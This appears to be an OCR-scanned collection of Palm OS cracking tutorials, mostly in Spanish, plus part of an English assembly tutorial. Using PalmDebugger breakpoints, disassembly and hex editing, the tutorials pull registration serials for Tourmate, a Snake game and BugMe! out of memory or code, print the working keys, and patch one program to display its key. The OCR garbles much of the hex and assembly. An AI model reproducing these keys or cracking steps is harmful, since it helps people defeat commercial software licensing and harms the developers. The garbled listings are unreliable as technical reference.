00001C72 4F EF 00 20 LEA.L $20(A7), A7 


00001C76 66 50 BNE.S LOC_1CC8 
00001C78 41 FA 01 70 LEA.L $170(PC), AO 
00001C7C 48 50 PEA.L (AO) 
00001C7E 41 FA 01 6C LEA.L $16C(PC), AO 
00001C82 48 50 PEA.L (AO) 
00001C84 41 FA 01 A4 LEA.L $1A4(PC), AO 

00001C88 48 50 PEA.L (AO) 

00001C8A 3F 3C 03 E8 MOVE.W +$03E8, -(A7) <----- AQUI PARA EL DEBUGGER al poner un "atb 
FrmCustomAlert" 

00001C8E 4E 4F Al 94 SysTrap FrmCustomAlert 

00001C92 3D 40 FF CE MOVE.W DO, -$32(A6) 

00001C96 0C 40 00 01 CMP.W +$0001, DO 

00001C9A 4F EF 00 OE LEA.L SE(A7), A7 


00001C9E 66 00 00 EO0 BNE LOC_1D80 

00001CA2 42 27 CLR.B -(A7) 

00001CA4 48 78 00 18 PEA.L $18 

00001CA8 48 6E FF D2 PEA.L -$2E(A6) 

00001CAC 4E 4F AO 27 SysTrap MemSet 

00001CBO 3D 7C 00 16 FF.. MOVE.W +$0016, -S$2E(A6) 
00001CB6 48 6E FF D2 PEA.L -$2E(A6) 

00001CBA 4E 4F Al 1B SysTrap EvtAddEventToQueue 
00001CBE 70 01 MOVE.L +$1, DO 


00001CC0 4F EF 00 OE LEA.L SE(A7), A7 
00001CcC4 60 00 00 BE BRA LOC_1D84 


Después de esto cargar el emulador y el debugger y el programa víctima en la ventana de registro para que este listo para 
dar un click y saltar al PalmDebugger. 


En el debugger debemos escribir y ver lo siguiente: 


Initializing parser... 
Initializing lex... 
Installing keywords... 
Initializing eval... 
Initializing exec... 
Loading startup script... 


Deb0ut = false 
SymbolsOn = true 
StepRegs = false 
ReadMemHack = false 
Attached = false 


dot address = 00000000 
last address = 00000000 
last count = 00000000 


att (Esta intrucción conecta directamente al emulator) 

EXCEPTION ID = $80 

'"TargetCfgRoutines' 

+S00FO 1018871C *LINK A6,$0000 | 4E56 0000 

atb "FrmCustomAlert" (Este breakpoint parara en esta llama de API al clickar Ok) 

A-trap set on 0194 (FrmCustomAlert) 

g (Con "GO" nos conectamos al emulador) 

EXCEPTION ID = $80 

"RegistryFormHandleEvent_ FP9Eve' 

+5014E 0004B758 *_FrmCustomAlert ; $1006969C | 4E4F A194 

il (Escribimos "il" para mostrarnos las siguientes 10 instrucciones de código vivo) 

"RegistryFormHandleEvent__FP9Eve 0004B60A' 

+5014E 0004B758 *_FrmCustomAlert ; $1006969C | 4E4F A194 

+50152 0004B75C MOVE.W DO,-$0032(A6) | 3D40 FFCE 

+$0156 0004B760 CMPI.W +$0001,D0 ; '..' | 0C40 0001 

+5015A 0004B764 LEA $000E(A7),A7 | 4FEF 000E 

+$015E 0004B768 BNE.W RegistryFormHandleEvent__FP9Eve+$0240; 0004B84A]| 6600 00E0 

+50162 0004B76C CLR.B -(A7) | 4227 

+$50164 0004B76E PEA $00000018 ¿; 00000018 | 4878 0018 

+50168 0004B772 PEA -$002E(A6) | 486E FFD2 

+$016C 0004B776 _MemSet ¿ $1002018A | 4E4F A027 

+$50170 0004B77A MOVE.W +$0016,-S$002E(A6) ; '..' | 3D7C 0016 FFD2 

+$50176 0004B780 PEA -$002E(A6) | 486E FFD2 

+5017A 0004B784 _EvtAddEventToQueue ; $100493DC | 4E4F A11B 

+5017E 0004B788 MOVEO.L +$01,DO | 7001 

+$0180 0004B78A LEA $000E(A7),A7 | 4FEF 000 

+$0184 0004B78E BRA.W RegistryFormHandleEvent__FP9Eve+$0244; 0004B84E| 6000 OOBE 

+50188 0004B792 LEA -$0316(A5),A0 | 41ED FCEA 

+$5018C 0004B796 MOVEO.L +$12,DO0 | 7012 

+5018E 0004B798 MOVE.L -(A0),-(A7) | 2F20 

+$50190 0004B79A DBF DO0,*-$0002 ; 0004B798 | 51C8 FFFC 

+50194 0004B79E JSR WriteToDatabase_ F8Registry+$0002; 0O004BF10| 4EBA 0770 

dm a2 (Aqui pedimos que se nos muestre el contenido del registro de menoria A2) 
basta con presionar varios enters en mi caso 14 veces y nos topamos con: 


00004FD2: 31 32 33 34 35 36 37 38 39 30 00 00 00 00 00 30 "1234567890 a o" 
00004FE2: 12 00 1A 25 00 02 00 0B 00 03 AC 4E 41 00 00 00 "...S....... NA..." 
00004FF2: 00 00 00 02 00 0B 00 00 00 00 00 01 00 0A 00 03 "...c.c.occoooo..... ” 
00005002: AC 3E 00 00 00 03 DA AO 00 00 4E 06 80 03 56 42 ".>........ N...VB" 
00005012: 00 01 AC 89 34 31 33 33 31 37 38 31 38 00 00 00 ".... 413317818..." 
00005022: 00 12 02 00 1A 3A 31 31 33 34 31 36 37 31 39 00 "..... :113416719." 
00005032: 80 03 56 1E 00 01 AC 77 00 5D 00 03 6€C 30 41 00 "..V....w.]..10A." 
00005042: 00 00 00 00 00 AO 00 5D 00 00 00 00 00 9F 00 5€ "....... IA xn 
00005052: 00 03 6€ 20 00 00 00 03 DA AO 00 00 51 12 80 00 "..l ........ Oo" 
00005062: 00 7A 00 00 00 B9 00 00 00 00 00 00 EF EF 2E EA ".Z......oooo.... ml 
00005072: 00 00 00 00 00 03 00 00 50 7C 09 00 00 00 50 8E "........ BluscsiPar 
00005082: 04 00 00 00 50 AA 00 00 00 00 50 B2 00 00 00 00 "....P..... Dita de 
00005092: 00 00 00 00 00 00 50 9A 44 61 74 61 62 61 73 65 "...... P.Database" 
000050A2: 20 45 72 72 6F 72 00 00 80 00 80 03 55 A4 00 01 " Error...... Une" 


En dm a2 basta con presionar varios enters y veremos como se compara nuestro serial 


falso 1234567890 con 413317818 para los datos que introducimos. 


Probando aquel serial en la Palm real en mi caso una Tungten T53 que supuso todos mis ahorros, y el serial efectivamente 
es valido, pero curiosamente no nos muestra una ventana de agradecimiento a lo mejor es una protección que quiso darle 
el programador, queda de tarea hacer un keygen por ustedes mismos que nos es difícil. Queda de ustedes rastrear 
instrucción por instrucción para saber como se construye el serial. 


Analizando Tourmate v1.1 


Esta versión tiene ligeras modificaciones pero el serial de la versión 1.0 es valido en la v1.1 


Initializing parser... 
Initializing lex... 
Installing keywords... 
Initializing eval... 
Initializing exec... 
Loading startup script... 


Deb0ut = false 
SymbolsOn = true 
StepRegs = false 
ReadMemHack = false 
Attached = false 

dot address = 00000000 
last address = 00000000 
last count = 00000000 


att 
EXCEPTION ID = $80 
'"TargetCfgRoutines' 


+S00FO 1018871C *LINK A6,$0000 | 4E56 0000 

atb "FrmCustomAlert" 

A-trap set on 0194 (FrmCustomAlert) 

g 

EXCEPTION ID = $80 

"RegistryFormHandleEvent__FP9Eve' 

+502A8 00061452 *_FrmCustomAlert ¡ $1006969C | 4E4F A194 


dm a2 500 

00004E68: 00 AO 00 AO 1F FA 64 00 3A 00 00 00 00 00 00 A0 "...... A " 
00004E78: 00 AO 00 00 00 00 00 9F 00 9F 00 03 DE 4C 03 02 "......o....... Dira 
00004E88: 00 03 DA AO 00 03 DB 48 04 4C AA 00 00 00 00 00 "....... ¡AA m 
00004E98: 50 08 00 06 11 AA 00 03 00 00 00 00 03 E8 00 09 "P.....ooo....... di 
00004EA8: 00 00 4E AC 09 00 00 00 4E E2 00 00 00 00 4F 04 "..N..... Nieves O.” 
00004EB8: 00 00 00 00 4F 2C 00 00 00 00 4F 54 01 00 00 00 "....O0,....OT....” 
00004EC8: 4F 7C 01 00 00 00 4F 9A 08 00 00 00 4F B2 08 00 "O|....O..... Oz" 
00004ED8: 00 00 4F CC 08 00 00 00 4F E4 00 00 00 00 00 00 "..O..... Dia ds A 
00004EE8: 00 00 00 00 4E EE 52 65 67 69 73 74 65 72 20 41 "....N.Register A" 
00004EF8: 70 70 6C 69 63 61 74 69 6F 6E 00 00 04 4D 00 3F "pplication...M.?" 
00004F08: 00 20 00 5C 00 0C E3 40 00 00 50 38 80 00 1B 70 ". .X...Q..P8...p” 
00004F18: 00 00 27 9A 00 06 00 10 00 26 00 00 00 00 00 06 "..'...... Lo " 
00004F28: 00 00 00 00 04 4E 00 3F 00 42 00 5C€ 00 0C E3 40 "..... N.?.B.X...e” 
00004F38: 00 00 50 50 80 00 1B 74 00 00 49 C6 00 05 00 10 "..PP...t..l..... " 
00004F48: 00 26 00 00 00 00 00 05 00 00 00 00 04 4F 00 SE ".£........... O.2n 


00004F58: 00 68 00 5C 00 0C FB 40 00 00 50 68 80 00 1B 9C ".h.X...Q..Ph....” 
00004F68: 00 00 00 00 00 0B 00 0C 00 0B 00 00 00 00 00 OB ".....ocooooo..... di 
00004F78: 00 00 00 00 04 53 00 12 00 8€ 00 32 00 0C 00 00 "..... Ds A 


00004F88: 4F 90 E9 00 00 00 00 00 52 65 67 69 73 74 65 72 "O....... Register" 


00004F98: 00 00 04 54 00 5B 00 8C€ 00 32 00 0C 00 00 4F AE "...T.[...2....0." 
00004FA8: E9 00 00 00 00 00 54 72 79 00 04 60 00 05 00 21 "...... A 
00004FB8: 80 00 00 00 00 00 4F CO 46 69 72 73 74 20 4E 61 "...... O.First Na" 


00004FC8: 6D 65 00 00 04 61 00 05 00 43 80 00 00 00 00 00 "me...a...C...... " 
00004FD8: 4F DA 4C 61 73 74 20 4E 61 6D 65 00 04 63 00 05 "O.Last Name..c.." 


00004FE8: 00 67 80 00 00 00 00 00 4F F2 52 65 67 69 73 74 ".gQ...... O.Regist" 
00004FF8: 72 79 20 4B 65 79 00 00 00 00 00 30 12 00 1A 2C "ry Key..... Oia 
00005008: 00 AO 00 AO 00 03 42 50 41 00 00 00 00 00 00 A0 "...... BPA....... " 
00005018: 00 A0 00 00 00 00 00 9F 00 9F 00 03 42 40 00 00 "............ BR..." 
00005028: 00 03 DA AO 00 00 4E 68 00 00 00 18 12 00 1A 60 "...... Nice do Y 
00005038: 42 65 6É 69 74 6F 00 4E 41 00 00 00 00 00 00 02 "Benito.NA....... E 
00005048: 00 00 00 18 12 00 1A 6A 53 74 61 63 79 00 AC 4ÉE "....... JStacy..N" 
00005058: 41 00 00 00 00 00 00 02 00 00 00 14 12 00 1A 62 "A.............. b" 
00005068: 31 33 32 32 34 35 36 37 39 38 30 00 00 00 00 30 "13224567980....0" 
00005078: 12 00 1A 64 00 02 00 0B 00 03 AC 4E 41 00 00 00 "...d....... NA..." 
00005088: 00 00 00 02 00 0B 00 00 00 00 00 01 00 0A 00 03 "....occcoooo..... " 
00005098: AC 3E 00 00 00 03 DA AO 00 00 50 08 80 00 00 44 ".>........ Bus sD" 
000050A8: 00 00 00 88 00 00 27 34 00 03 00 00 00 00 00 00 "...... MU rai " 
000050B8: 00 03 00 00 80 00 00 2C 00 00 00 7C 00 00 27 4C€ "....... A a E 
000050C8: 00 00 00 03 F3 5€ 40 00 00 7F FB 47 80 7F FB 46 "..... XO....G...F" 
000050D8: 00 05 DO 2C 00 00 00 01 00 00 00 00 00 00 00 00 "...orcoooooooo.... y 
000050E8: 01 00 00 OC 12 00 1A 98 32 30 00 02 01 00 00 0€C "........ LO vaa anies ” 
000050F8: 12 00 1A 9C 32 30 00 02 01 00 00 0C 12 00 1A A0 "....20.......... " 
00005108: 32 30 00 02 00 00 00 0A 12 00 1A B6 31 00 01 00 "20.......... Lujan 
00005118: 00 0C 12 00 1A B3 6É 6F 00 02 00 00 00 0A 12 00 "...... DOG pio " 
00005128: 1A B7 31 00 00 00 00 30 12 00 1A B4 61 61 61 61 "..1....0....aaaa" 


00005138: 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 "aaaaaaaaaaaaaaaa" 
00005148: 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 "aaaaaaaaaaaaaaaa" 
00005158: 61 61 61 00 00 00 00 30 12 00 1A CA 61 61 61 61 "aaa....0....aaaa" 
00005168: 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 "aaaaaaaaaaaaaaaa" 
00005178: 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 "aaaaaaaaaaaaaaaa" 


00005188: 61 61 61 00 01 00 00 12 12 00 1A D6 54 6F 75 72 "ada......... Tour" 
00005198: 4D 61 74 65 00 EE 00 00 00 16 12 00 1A El 56 65 "Mate.......... Ve" 
000051A8: 72 20 31 20 50 61 6€ 6D 20 4F 53 00 80 02 FO 84 "r 1 Palm OS..... ds 
00005188: 00 01 7E DF 34 31 33 33 31 37 38 31 38 00 00 00 "..-.413317818..." 
000051C8: 00 12 02 00 1A F9 33 31 39 36 31 36 30 31 32 00 "...... 319616012." 
000051D8: 80 02 FO 60 00 01 7E CD 80 63 00 00 00 00 93 EA "... ....Co.o.... " 
000051E8: 80 67 10 00 00 00 95 46 80 3F 04 00 00 00 96 3E ".g..... ¡AA >" 
000051F8: 80 27 02 00 00 00 97 3E 80 03 02 00 00 00 97 F4 ".'"..... Paisa " 
00005208: 80 20 00 00 00 00 98 58 80 3F 16 00 00 00 9A AZ ". ..... Xi " 
00005218: 80 21 00 00 00 00 9B 8E 80 01 00 00 00 00 9C 10 ".!l.............. ” 
00005228: 80 00 00 00 00 00 929€ 3A 80 00 00 00 00 00 9C 74 "...o.ooooto...... E" 
00005238: 80 FF 10 00 00 00 9D AO 80 00 1C 00 00 00 OE 48 "....oooooo...... a" 


00005248: 80 21 00 00 00 00 9E 7E 80 E3 80 02 EF E6 00 01 ".!..... e da " 
00005258: 7E 90 34 30 33 33 38 37 38 38 38 00 80 02 EF D4 "-.403387888..... "E 
00005268: 00 01 7E 87 00 00 00 00 00 00 00 00 00 00 00 0€C "..S.cocccooo..... " 


Esto es todo por hoy , y ya saben esta información es solo para fines educativos. si les gusta el programa cómprenlo, La 
ley no tiene derecho a la censura ni debe exigir pago alguno ni indemnización por derecho a la libertad de expresión 
constitución política de mi país, puede variar de acuerdo a tu país , y si vives en América Latina el Reversing es legal. 
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(ONewBies ()Intermedio ()Avanzado ()Master ()Gúru 


INTRODUCCION 


Cargamos el juego el emulador , desensamblamos con el PalmDemon v0.27, Analizamos a donde esta la 
ventana de Chico malo, y entes de esta ventana tenemos una llamada a una API que es la de el: 


atb "StrCompare" que les parece si cargamos el emulador y el debugger y ponemos un breakpoint en esta 
API y despues buscamos en la memoria de los registros AO,A1.....A7 que hay tiene que estar el serial mistico. 


AL ATAQUE 
PASO 1 : Análisis Básico 


Echo lo anterior en el Palmdebugger escribimos: 
Para ello usaremos: 


Name: Compaq 
Code: 1234567890 <--- Falso serial por supuesto 


Initializing parser... 
Initializing lex... 
Installing keywords... 
Initializing eval... 
Initializing exec... 
Loading startup script... 


DebOut = false 
SymbolsOn = true 
StepRegs = false 
ReadMemHack = false 
Attached = false 

dot address = 00000000 
last address = 00000000 
last count = 00000000 


att <--- Aqui conectamos al Debugger con el emulador 
EXCEPTION ID = $80 


'"TargetCfgRoutines' 


+$00FO 1018871C *LINK A6,$0000 | 4E56 0000 

atb "StrCompare" <--- Que el emulador salte al debugger al llamar esta API 
A-trap set on 00c8 (StrCompare) 

g <--- Entrar al Emulador 


EXCEPTION ID = $80 

'"RegisterHandleEvent' 

+$007C€ 0004BE26 *_StrCompare ; $1001C2E2 4E4F A0OC8 

il <--- Ver las siguientes 10 intrucciones de código vivo, (vease el desensamblado) 
'RegisterHandleEvent 0004BDAA' 
+$007€ 0004BE26 *_StrCompare ; $1001C2E2 4E4F AOC8 
+50080 0004BE2A TST.W DO | 4A40 
+50082 0O004BE2C LEA $0012(A7),A7 | 4FEF 0012 

+50086 0004BE30 BNE.S RegisterHandleEvent+$00A2 ; 0004BE4C | 661A 


+50088 0004BE32 MOVE.wW +$0001,-$02E8(A5) ; '..' | 3B7C 0001 FD18 
+$008E 0004BE38 MOVE.W +$03E8,-$0046(A5) ; "'h.' | 3B7C 03E8 FFBA 
+$0094 0O004BE3E MOVE.W -$0046(A5),-(A7) | 3F2D FFBA 
+50098 0004BE42 _FrmGotoForm ; $10069DBE | 4E4F A19B 


+5009C 0004BE46 MOVEQ.L +$00,D3 | 7600 

+5009E 0004BE48 ADDO.W +$02,A7 | 544F 

+$00A0 0004BE4A BRA.S RegisterHandleEvent+$00B8 ; 0004BE62 | 6016 
+500A2 0004BE4C MOVE.W +$$0514,-(A7) ; '..' | 3F3C 0514 

+500A6 O004BE50 _FrmAlert ; $10069070 | 4E4F A192 

+S00AA 0004BE54 ADDO.W +$$02,A7 | 544F 

+500AC 0004BE56 BRA.S RegisterHandleFvent+$00B8 ; 0004BE62 | 600A 
+S00AE 0004BE58 MOVE.W +$0514,-(A7) ; '..' | 3F3C 0514 

+500B2 O004BE5C _FrmAlert ; $10069070 | 4E4F A192 

+500B6 0004BE60 ADDO.W +$02,A7 | 544F 

+500B8 0004BE62 MOVE.L -$02EC(A5),-(A7) | 2F2D FD14 


+S00BC 0004BE66 _MemHandleUnlock ; $1001FC9E | 4E4F A022 

dm a2 100 <--- Según el desensamblado aquí están los datos que escribimos 
00004F7A: 43 6F 6D 70 61 71 00 El 00 00 00 00 33 DO 80 EF "Compaq aaa o 
00004F8A: 00 00 00 00 35 44 80 E7 00 00 00 00 36 20 80 21 "....5D...... O) .1" 
00004F9A: 04 00 00 00 36 F8 80 FF 16 00 00 00 38 96 80 FF "....6....... Bus” 
00004FAA: 16 00 00 00 3C 90 00 00 00 00 00 00 00 00 00 26 "....S.....o..... Ss" 
00004FBA: 22 00 1A 23 31 33 32 34 35 36 37 38 39 30 00 21 ""..1+1324567890.!" 
00004FCA: 26 00 00 00 49 90 80 61 00 00 00 00 4A 5C 80 EF "£€...l..a....J.." 
00004FDA: 00 00 80 03 56 74 00 01 AC A2 00 02 00 0B 00 03 "....Vt.......... Y 
00004FEA: AC 4E 41 00 00 00 00 00 00 02 00 0B 00 00 00 00 ".NA............. ul 
00004FFA: 00 01 00 0A 00 03 AC 3E 00 00 00 03 DA AO 00 00 "....... Ass ui 
0000500A: 4D 08 80 03 56 44 00 01 AC 8A 49 6EÉ 63 6F 72 72 "M...VD....Incorr" 


0000501A: 65 63 74 20 43 6F 64 65 2C 20 74 72 79 20 61 67 "ect Code, try ag" 
0000502A: 61 69 6É 2E 00 FC 80 00 00 A6 00 00 00 CD 00 AO "aiNd.......o..... , 


0000503A: 00 AO 1F FA 64 00 32 00 00 02 00 00 00 9C 00 9C "....d.2......... , 
0000504A: 00 00 00 00 00 9B 00 9B 00 03 DE 4C 03 02 00 03 "........... Lin 
0000505A: DA AO 00 00 4F E4 2E E0 8A 00 00 00 00 00 00 00 "....O...o.ooo.... y 
0000506A: 00 00 00 00 FF FF 2E E4 00 00 00 00 00 03 00 00 "...cccocco.o..... " 
dm a7 100 

0003BA66: 00 03 BA 8C 00 00 4F BE 00 00 4F 7A 00 03 BA 8€ "...... Ori 
0003BA76: 00 11 00 00 00 00 00 04 03 37 00 04 BD AA 00 00 "......... Data rias " 
0003BA86: 4D 08 00 04 A8 5C 45 4F 50 2D 35 38 30 33 00 04 "M....NEOP-5803.." 
0003BA96: 00 03 BA D6 10 06 C9 30 00 03 BA EC 00 03 BA EA "....... Misa " 
0003BAA6: 00 00 00 OE 00 03 BA C2 10 06 68 OE 00 03 BA EC ".......... Dr " 
0003BAB6: 00 00 00 09 00 00 4D 08 00 03 BA EC 00 03 BA DE "...... Moss " 
0003BAC6: 10 06 9C 24 00 00 4D 08 00 03 BA EC 00 00 00 OE "...S..M......... " 
0003BAD6: 00 03 CF AE 00 03 AC 6C 00 03 BB 04 00 04 C2 20 "....... MO " 


0003BAE6: 00 03 BA EC 00 00 00 09 00 00 00 21 00 91 05 TE ".ccccooccc.l...o” 
0003BAF6: 00 00 4E 88 00 00 00 00 00 00 00 00 00 00 00 03 "..N............. il 
0003BB06: BB 0E 00 04 C2 74 03 E8 00 03 BB 30 00 04 A8 DA "..... ¡A Da 
0003BB16: 00 00 00 00 00 00 00 8E 00 00 00 00 27 AE 00 00 "............ yes 


0003BB26: 49 D8 80 03 BB 06 00 03 BB 44 00 03 CF 7E 10 01 "I........ Dis 
0003BB36: AE 9C 00 03 CF 5E 00 00 00 44 F0 00 00 00 00 00 "..... Das le 
0003BB46: 00 00 00 00 00 8E 00 03 F3 5C 80 04 03 8E 00 00 "......... Najaaas z 
0003BB56: 27 34 00 03 AC 6C 00 00 49 D8 00 02 00 00 27 34 ""4...1..1l..... rg" 


El serial correcto es EOP-5803 


El programa se registra perfectamente con EOP-5803, pero el mal agradecido nunca da las gracias. 


PASO 2 : Hacer que el programa nos recuerde el serial. 


A que pasaría Cada ves que instalaremos el juego, y tengan que revisar sus grandes bases de datos de 
claves seriales, Pues seria molesto estar buscando esa clave, por lo que procedemos a hacer que el 
programa nos recuerde el serial cada vez que lo instalemos ó lo en compartamos enviando por infrarrojo 
a una amiga Ó amigo, novia, esposa,etc. 


Abriremos el editor Hexadecimal favorito en mi caso el UltraEdit32 vl0a y buscamos la cadena "To 
obtain a registration code, send your name...." , cambiemoslas por la siguiente ", Esto se puede ver 
mejor abajo: 


C UltraE dit-32 - C:3My DownloadsiGame snake 1.02 Retail. pre 


|| Archivo Editar Buscar Proyecto Wer Formato Columma Macro ¿Avanzado Wentana ¿Ayuda 


Il Game snake 1.02.prc Game snake 1.02 Retail. pre |] | 


D0000630h: 
00000640h: 
D00000650h: 
D0000660h: Z Z 
DO0000670h: 6Fr 6l E 73 568 64 0D 79 75 : code, send. your 
D0000680h: = DE GE 64 2 2D ) 69 6C E name and e-mail 
00000690h: 6 É 69 7£ : 21 A allong with .$929 
D000006a0h: ( E 2 E 

DOOOO6b0h: 
DOOODé<Oh: 
000006d0h: 00 8D 00 32 00 0Cc 00 F3 3F 32 C29 00 00 00 00 00 ; .1.2...%4?2p..... 
DO00006e0h: ; 


00 00 00 F3 3E ) 6 de 
61 7 O 2 O ; ¡Nace 


6Db 70 


EOP-5803 
Registration Form 
Name: N yz : mn 
Code: 2... D0 00 00 ; 1.2... 47. pp... 
Code: . 
To obtain a registration code, send , 7F 00 3F ; ..Register...0.? 
Name: Compaq 


your name and e-mail allong with 
$9,00 (US) to: 


00 00 00 ; .1.2...4?2fp..... 
00 00 00 ; Later..G...PG... 
66 74 77 ; .4?FMobile Softw 
6€C 6F 67 79 ; are £ Technology a 


Y y Portapapeles 10 de 24 
Mod: 12/04/05 06:02:46p.m. [Bytes Elemento recopilado. 


Code: EOP-5803 


Mobile Software £: Technology 
Av. Prof. Luis Freire, 700, sl 118 
CDU, Recife, PE - Brazil 


Mobile Software £: Technology 
Av. Prof. Luis Freire, 700, sl 118 
CDU, Recife, PE - Brazil 

Or register on the web at: 
www.mobile.corm.br*palrm*garnes 


Nas m0 0 ENS 


Or register on the web at: 
www.mobile.corn.br*palrn*garmes 


El juego parece registrarse a la perfección, En otra ocación veremos como crear un generador de llaves, 
Hasta la próxima 
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(OSerial ( )HotSync/ Code ()Trial ()Multiprotección ( )Encriptado ( )Otro 
(O NewBies ( )Intermedio ()Avanzado ( )Master ()Gúru 
SouthDebugger, PRCedit, PilotDis. POSE Palm emulador, UltraEdit-32, PalmDemon 0.27 


INTRODUCCION 
12:01 a.m. 20/06/00 -= Palm Reversing tutorial by Latigo =- 


AL ATAQUE 


Hey! This time im writting a little tutorial on Palm Rerversing / cracking. The palm enviroment is something that has 
catched my attention and is not willing to release it :). 
Its like a new world to be explored, and that is what attratcts me. Besides, palms rox!. 


Target = Bugme! 2.74.2 (included in this zip) 


Toolz = pre2bin,pildis,hiew (pre2bin and pildis can get found in Darrin Massena's ASDK http://www.massena.com/ 
darrin/pilot/index.html) 


Goal = Get a serial for this program. 


== * == 
Install the program in your palm or in the Emulator (if you don't know what im talking about im sorry). The first thing to 
identify is some string of any kind that will allow us to make the initial search. So run bugme, go to the menu, click on 
'options' and then on 'Register BugMe!'. Just enter some garbage as a serial and there we have it :) .. 'the code you 
entered was not your..' that's enough!. 

This string is inside an Alert resource. So what we have to do now is to extract all the alert resources from Bugme.pre 
and see what is the name of the resource that holds this string. 

We are going to do this with 'pre2bin'. So 'prc2bin' bugme!.pre and boom; there we got tons of resources. But we need 
the Alert resources (taltxxx.bin). 


Ok ok so far we know that the name of the alert resource that gets called when we input an erroneous serial is O5dc ...so 


Don't despair my little friend. This is all we need to make it to the end, this is the iceberg's tip :D. 


When the name of an alert resource is pushed into the stack, a dollar sign ($) is appended to the beginning of the Alert 
ID. So in our case we'd have to search for $5dc. Time for disassembling. 

'pildis bugme!.prc' will give us some very nice DragonBall disassembly. 

View it with hiew and search for the string '$5dc' and if you are a good boy, you'll land here: 


00001696 426dff94 L125 CLR.W -108(A5) 

0000169a 3£3cC05dc MOVE.W ++1500!$5dc,-(A7) <----- yepeey! 
0000169e 4e4f TRAP +15 

00001640 a192 DC.W sysTrapFrmAlert 


In 169a an Alert ID is being pushed into the stack. Remember that A7 register is the stack. So there is a move instruction 
and a decrement of a7. This means that something is being pushed. 

Then in 1640 we see sysTrapFrmAlert; FrmAlert is the API that displays Alert Resources, and its only parameter is an 
Alert Resource ID. So it seems that this is what we've been looking for. 

Yes, there are other instances of $5dc if you keep on looking for. But NONE of them are followed by a sysTrapFrmAlert 
which means that this is THE spot. 

Now we have to reverse our way up. Got to unravel the little mistery of who/what/why we end up in this place..so lets 
go on. 


See the L125 at 1696? thats a LABEL. A label which is referencing some spot during the execution of a program. If you 
are a coder you know what im talking about. So now we got to look for where that label is called. Follow me. 
Searching upwards in the dead listing i find this: 


00001684 4a6dff94 L124 TST.W -108(A5) 
00001688 670c BEQ L125 


TST.W -108(a5) means 'Check if some Global variable is O. If it is(BEQ), then JUMP to L1253' 

BEQ = 'Branch if EQual' which is the same as JZ. 

This leads us to know that there is a global variable (reg flag) that controls the state of the program in terms of 
'unregistered/registered'. Good :) 

Another upwards search starts revealing what would be the core of the registration routine.. 


sysTrapStrCompare at 1662 tells us that there is some string comparison going on.. 
but 1 keep going upwards.. 


and at 15da 1 find sysTrapFldGetTextPtr whose function is to return a pointer to some string from a text Field (edit box). 
And here i stay, because 1 _feel_ this is the right spot. (1 can feel the code even though im not an HCUker..hehe, j/k). 
Unroll your sleeves, hang up the phone, because we're going to start working from this point down!. 


00015da DC.W sysTrapFldGetTextPtr ; get pointer to string 


00015dc ADDO.W +4,A7 ; correct stack 
00015de MOVE.L A0,-(A7) ; push the recently returned pointer 
00015e0 PEA -30(A6) ; push some buffer 
00015e4 TRAP +15 ; call API 
00015e6 DC.W sysTrapStrCopy ; copy pointer to buffer 
00015e8 ADDO.W +8,A7 ; Correct Stack 
00015ea CLR.W -108(A5) ; Clear reg flag 
00015ee PEA -30(A6) ; push buffer 
00015f2 TRAP +15 
00015f£4 DC.W sysTrapStrlen ; get length 
00015f6 ADDO.W +4,A7 ; correct stack 
Ss 


00015£8 SUBO.W +6,DO0 ; sub ?7? 


00015fa BNE 1122 

00015fc CMPI.B +101!$565,-30(A6) ; is the first char of the buffer an 'e'? 
0001602 BNE L121 ; no, Jump 

0001604 CMPI.B +117!575,-29(A6) ; is the second char of the buffer an 'u'? 
000160a BNE L121 ; no, Jump 

000160c CMPI.B +114!$72,-28(A6) ; is the third char of the buffer an 'r'? 
0001612 BNE 1121 ; no, Jump 

0001614 CMPI.B +111!$56f,-27(A6) ; is the fourth char of the buffer an 'o'? 
0001l6la BNE L121 ; no, Jump 

000161c CMPI.B +$112!$70,-26(A6) ; is the fifth char of the buffer an 'p'? 
0001622 BNE 1121 ; no, Jump 

0001624 CMPI.B +97!$61,-25(A6) ; is the sixth char of the buffer an 'a'? 
000162a BNE L121 ; no, Jump 

000162c MOVE.W +1,-108(A5) ; everything's ok, regflag = 1 

0001632 1121 TST.W -108(A5) ; flag emtpy? 

0001636 BEQ 1122 ; yes, Jjmp to bad boy msg 


He simply checks each and every letter of the inserted string against 'europa' :P. 
Man you could have gone a little bit further couldn't ya? 


Let's dissect one line in case you still don't get it. 
00015fc CMPLB ++101!$65,-30(A6) ; is first char of buffer an 'e'? 


First of all, you must know that -30(a6) is a local variable. Why local? simply this '(a6) indicates us that this variable is 
local. If instead of a6 it was a5 then that would mean that the variable is global. 

'CMPT = CoMPare Inmediate 

..B' is specifying the size of the operands to be compared. In this case is a BYTE. 

++101!$65 is one of the operands. Its either 101 decimal or 65 Hexadecimal. 


So all together is: 

'Compare if the byte at -30(a6) is 101(dec) which is the same as 65 Hex. 
And the x86 version of this instruction would be something like: 

'CMP BYTE PTR LocalVariable, 101' 


Of course,the registration routines goes on, checking that your string is just 'europa' and not another thing. But its not 
worth the examination. We know there is only ONE serial,and we got it :). 


That's all! piece of cake. 

Hope you liked the tutorial and/or learned something. 

Any mail,comment, criticism,request send them to -> latigoOciudad.com.ar 
Expect more palm coding and cracking tutorials at -> www.latigo.cjb.net 
Cya! 


Latigo 
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INTRODUCCION 
Palm ASM Tutorial N23 by Latigo 


AL ATAQUE 


Third one and counting!. This is the third Palm assembly coding tutorial by yours truly. 


Tools: This is 100% pure pila asm. The 68k assembler by Darrin Massena. You can get pila (get the whole ASDK) and 
other great tools in his site. 


Brief Description: This tutorial teaches how to use Edit fields (text boxes). Two of them are involved and all the program 
does is copy one string from one field to the other one :).l assume that you downloaded the whole zip file (palmtut3.zip). 
As usual we'll use two files: a Resource script file and the .asm one. I'm only going to explain those thigs which are new. 
The basic stuff covered in previous tutorials is not covered here. 


File: Fields.rcp 


tinclude "Fields.h" 


MENU 1D 1000 


BEGIN 
PULLDOWN "Options" 
BEGIN 
MENUITEM "About This program.." 1002 
END 


FORM ID 1000 AT (0 O 160 160) 
MENUID 1000 
NOFRAME 
USABLE 
BEGIN 
TITLE "This time we use Fields!" 
LABEL "Source Text" ID 1702 AT (19 41) USABLE 
LABEL "Dest. Text" ID 1703 AT (19 76) USABLE 


SINGLELINE MAXCHARS 10 


SINGLELINE MAXCHARS 10 
¡; All the modifiers of the FIELD object speak for themselves 


